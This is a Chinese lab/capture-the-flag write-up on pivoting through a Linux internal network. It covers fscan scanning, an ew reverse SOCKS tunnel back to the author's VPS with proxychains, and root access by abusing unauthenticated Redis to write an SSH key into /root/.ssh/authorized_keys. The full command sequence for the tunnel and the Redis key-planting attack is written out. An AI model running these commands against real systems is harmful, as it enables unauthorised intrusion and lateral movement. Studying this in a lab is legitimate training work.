一次简单的Linux下内网漫游

0x00 内网漫游-起源

靶场遇见一道内网题目。地址：

cmseasy免费企业网站程序是国内首款免费营销型的企业网站系统 - Powered by CmsEasy

之前虽然学过一段时间windows下内网漫游，但是年少不经事，忘记太多，加上linux系统内网漫游从未接触，此题难度简单，所以记录学习。

0x01 内网漫游-信息收集

前台利用cms漏洞成功获得服务器权限，进入到内网漫游阶段。

一番信息收集，发现是linux系统，此时为www权限，使用searchexploit未发现漏洞，提权这个想法暂且搁置

github下载fscan的linux版本来探测内网，执行成功在当前目录生成result.txt文件，发现192.168.0.3存在6379端口，根据经验，基本判定靶场是希望通过redis未授权getshell内网主机。

./fscan -h 192.168.0.1/20

0x02 内网漫游-代理转发

个人vps是centos7，选用ew、proxychains两款工具代理流量，工具自行安装，安装过程自行百度。

这里有一个注意点，因直接在vps上进行操作，所以IP地址只需要修改为本地127.0.0.1，端口指定10800，同时需要注意把原本的socks4代理给注释掉，如果不注释会导致ew代理失败，这个坑让我卡住三天。

vi /etc/proxychains.conf 

 设置ew代理，这里端口10800与上面相呼应。

使用ew反代，端口可自行调整
vps本机
ew -s rcsocks -l 10800 -e 8888
目标机
ew -s rssocks -d vps-ip -e 8888 

可以看到socks代理已经建立。

配置完成，进行测试，使用curl请求内网存活的web网页发现已经成功访问，这时就可以正式开始内网漫游。

如果socks代理建立成功，下面会有数据交互，如果下面没有数据交互就说明代理建立失败，通过这一点可以判断操作成没成功。

redis-cli安装报错

centos7安装redis-cli遇到make报错问题，踩了不少坑，给出链接。

安装redis中执行make时出错及解决方案_疾风盲豪-亚青的博客-CSDN博客_make redis

Linux 安装Redis 时执行 make install报错： make: *** [server.o] Error 1 （已解决）_槐序二十四的博客-CSDN博客_linux安装redis执行make报错

0x03 通过redis未授权getshell

根据经验判断，192.168.0网段里192.168.0.3开放redis服务，之前个人文章写过两种方式，链接如下：

Redis未授权漏洞环境搭建复现问题解决_身高两米不到的博客-CSDN博客

rsa当时没有写，本次正好需使用rsa密钥去获得权限，命令如下所示。

如若失败可以参考链接，写的很详细：Redis未授权访问漏洞复现 - 雨中落叶 - 博客园

cd /root/.ssh/
ssh-keygen -t rsa
(echo -e "\n";cat id_rsa.pub;echo -e "\n") > test.txt
cat test.txt | proxychains4  redis-cli -h 192.168.0.3 -x set pub
proxychains4 redis-cli -h 192.168.0.3
config set dir /root/.ssh/
config set dbfilename "authorized_keys"
save 
exit

proxychains4 ssh -i id_rsa [email protected]

成功连入主机，redis未授权成功，得到flag。

 0x04 正常情况下内网漫游思路

其实在正常情况下，进入往往要使用burpsuite、sqlmap等工具对内网网站攻击。本机电脑使用vmware打开kali虚机，修改proxychains配置文件，注释掉原本的socks4，配置socks5为公网IP

vi /etc/proxychains4.conf 

 打开firefox设置代理

proxychains启用burpsuite，这里的思路是让firefox流量走burpsuite，然后burpsuite流量走ew，这样就可以通过burpsuite进行渗透。

之前使用的fscan，信息搜集就产生巨大作用。

proxychains4 burpsuite

以http://192.168.0.1:8006为例，就可以把目标机的内网网页代理到本地，下面就和正常的渗透测试一样，对其网页进行渗透即可。